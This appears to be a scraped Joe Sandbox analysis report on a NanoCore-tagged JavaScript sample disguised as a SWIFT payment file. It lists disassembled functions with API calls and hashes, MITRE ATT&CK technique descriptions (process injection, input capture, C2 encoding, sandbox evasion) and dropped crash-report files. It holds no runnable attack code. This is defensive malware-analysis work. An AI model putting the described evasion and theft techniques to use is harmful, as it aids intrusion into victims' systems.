Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F8D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(120632A0,00000000,00000000,00000008), ref: 00409FF0

Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
GetLastError.KERNEL32 ref: 0040A32B

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00403694 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040375B
___AdjustPointer.LIBCMT ref: 0040377E
___AdjustPointer.LIBCMT ref: 0040381A

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798

Uniqueness

Uniqueness Score: -1.00%

Function 0040B766 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789

Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F

___initconout.LIBCMT ref: 0040B799

Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0507E190 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 218threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0507E289

Strings

LR;v, xrefs: 0507E4FF
LR;v, xrefs: 0507E1BA

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: CurrentThread
String ID: LR;v$LR;v
API String ID: 2882836952-2984026332
Opcode ID: 7289d5e0733ae1416688721ea0564b60c719f202e24fb0b101ed0aeb9f25f059
Instruction ID: 3dbeb30ed255afae132d1298e8d9d4d51851014c1dd2c8a813ad3598cfbee418
Opcode Fuzzy Hash: 7289d5e0733ae1416688721ea0564b60c719f202e24fb0b101ed0aeb9f25f059
Instruction Fuzzy Hash: 09817B70D0524C8FDB50DFA9D844AAEBBF6FF88300F24846AD815BB350DB74A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403C90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00403CB5

Strings

RCC, xrefs: 00403CCF
MOC, xrefs: 00403CC7

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004018D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
___raise_securityfailure.LIBCMT ref: 00402045

Strings

HYA, xrefs: 00402040

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: HYA
API String ID: 3761405300-3949630065
Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E

Uniqueness

Uniqueness Score: -1.00%

Function 004072F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 004072F9
GetCommandLineW.KERNEL32 ref: 00407304

Strings

(4], xrefs: 004072FF

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: (4]
API String ID: 3253501508-1743720692
Opcode ID: 1862c5febd86a67a8cc931a8f9cf79bc572b9c2a7d58cda9ff65f2b50cd382cf
Instruction ID: 1c3be78323f1457dba36cc2e926ef687e279e392227457d27b0df23f55036d34
Opcode Fuzzy Hash: 1862c5febd86a67a8cc931a8f9cf79bc572b9c2a7d58cda9ff65f2b50cd382cf
Instruction Fuzzy Hash: 92B09278800A20CFC7008F32FA4E2C87BA0B28820A780C876E919D2B20E7740022DF1C

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SWIFT MO104978172_1301 EURO 9700.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fdqkbs.exe_3b5310cef4636bfdd6ade66b7a63e113c499e9f_d2ed2369_0d427a15\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_syhbwgs.exe_f4889ff7e22f232fc0b23411b3d2f693b1794092_282dfd12_0cfe7af0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_syhbwgs.exe_f4889ff7e22f232fc0b23411b3d2f693b1794092_282dfd12_12f69936\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FB5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7246.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72B4.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER72C2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7478.tmp.WERInternalMetadata.xml

Windows Analysis Report
SWIFT MO104978172_1301 EURO 9700.js

Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450
stringfilecomCOMMON

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre